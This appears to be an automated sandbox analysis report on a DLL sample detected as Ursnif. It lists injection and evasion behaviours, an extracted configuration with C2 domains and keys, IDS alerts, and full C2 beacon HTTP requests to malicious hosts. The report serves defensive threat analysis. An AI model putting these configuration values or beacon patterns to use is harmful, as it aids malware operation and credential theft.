Windows Analysis Report data.dll

Overview

General Information

Sample Name: data.dll
Analysis ID: 498359
MD5: b0165e4e73dad2ac1cb519ea1eab8bd6
SHA1: 4ebb5db088d233d4c85b19b299613a240ce25c95
SHA256: 7ff6558fd39f6d8db53aa0baa3f3a9b1edb02ea2631102b6d85eafaf4bbd702b
Tags: dll

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
May check the online IP address of the machine
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection:

Antivirus detection for URL or domain
Found malware configuration
Source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Multi AV Scanner detection for submitted file
Source: data.dll Virustotal: Detection: 7%
Multi AV Scanner detection for domain / URL
Source: art.microsoftsofymicrosoftsoft.at Virustotal: Detection: 10%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 0_2_00DD3FAB

Compliance:

Uses 32bit PE files
Source: data.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: data.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: h.pdb> source: powershell.exe, 0000000F.00000003.961179690.0000029E611B1000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdbXP source: powershell.exe, 0000000F.00000002.1028629479.0000029E4CF68000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdbXP source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdbXP source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdbXP source: powershell.exe, 00000011.00000002.994879898.0000026445852000.00000004.00000001.sdmp
Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: loaddll32.exe, 00000000.00000002.1185778870.000000006E4FF000.00000002.00020000.sdmp, data.dll
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457A5F6 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_0457A5F6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457CC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_0457CC4A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_0457198F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04580BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_04580BC5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBCC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_04BBCC4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_04BB198F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BC0BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_04BC0BC5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0097198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 49_2_0097198F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00980BC5 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 49_2_00980BC5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0097CC4A FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 49_2_0097CC4A

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49776 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49777 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49778 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49778 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49779 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49779 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49780 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49780 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49781 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49781 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49862 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49862 -> 194.147.86.221:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: init.icecreambob.com
Source: C:\Windows\explorer.exe Domain query: art.microsoftsofymicrosoftsoft.at
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 194.147.86.221 80
Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
May check the online IP address of the machine
Source: C:\Windows\System32\nslookup.exe DNS query: name: myip.opendns.com
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /HKPpcwlwrfQkTmv8P06H/3Wxv_2FnSDQGUBdPXw9/RYY8q690tWMw7_2FqiZKDR/tihJyHYSdUWc_/2Bk0Blz4/Ugw940qxXbfuHBW4kjFJy7m/qeLyDgVQe2/v1ANC_2B2jNzm_2B0/UCUkcrNLM1Qj/GKGs5Yns4a1/y2RcxBlEBBMDgc/vui4nnWlDWEvxcnjXpxFk/PDKIsTs7GBXCyaSr/TwT_2BF1pJMPI8c/ynG0YGZIeokgeQwjHf/KZMBUT4_2/BvirsVJDlpOpDnwD83YS/kQDSJlsGXWqTNVyxDqs/KuldZQ_2BlbTtmbV3TyeLX/ai8Q6i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic HTTP traffic detected: POST /oFicZj5usGm_2B0NL9gZLV/ZUmxvOk6Hl7SJ/EDK5fPOS/8bJn0oEKBXyaI_2FgFLHjIr/vR9EgPr9iZ/BsHMBlv9QxRTJNREz/mACP3yGg7skY/_2FdZEJn_2F/IV2mBc0GG_2FvT/53lPOvidBB1fn_2FI5kxG/suo5_2BB8niHf2Ry/rgnjnl9X_2F6HZr/tIOdn9dPOC7f1v8Cp_/2FP4dNfA6/YXJeUCPB5E1QadP6XZ0Z/70c_2FO_2BuW1MJ1FGY/r27cnguDBgf94rw_2FDi4i/aJyUeDcmN8xPq/7e51fVNw/PYHU8eZ8MJvwfaAYDz_2Fvf/Qi7bVln3AU/Hyoo0rU5uWfSrP9FI8hAt/b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NETRACK-ASRU NETRACK-ASRU
Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: rundll32.exe, 00000003.00000003.841471789.0000000000AE2000.00000004.00000001.sdmp String found in binary or memory: http://init.icecreambob.com/
Source: rundll32.exe, 00000003.00000003.826552250.0000000000AE2000.00000004.00000001.sdmp String found in binary or memory: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9Imm
Source: rundll32.exe, 00000003.00000003.831975638.0000000000AF4000.00000004.00000001.sdmp String found in binary or memory: http://init.icecreambob.com/l
Source: rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmp String found in binary or memory: http://init.icecreambob.com/lbK
Source: rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmp String found in binary or memory: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsb
Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.co/xa
Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.ux
Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp String found in binary or memory: http://ns.micro/1
Source: powershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000F.00000002.963606313.0000029E48941000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.935740628.0000026442311000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RuntimeBroker.exe, 0000002E.00000000.997237662.000001B4FB11D000.00000004.00000001.sdmp String found in binary or memory: http://twitter.com/spotify:
Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_TermsW~
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown DNS traffic detected: queries for: init.icecreambob.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Oct 2021 23:34:10 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeVary: Accept-EncodingData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms" equals www.facebook.com (Facebook)
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms" equals www.twitter.com (Twitter)
Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms" equals www.youtube.com (Youtube)
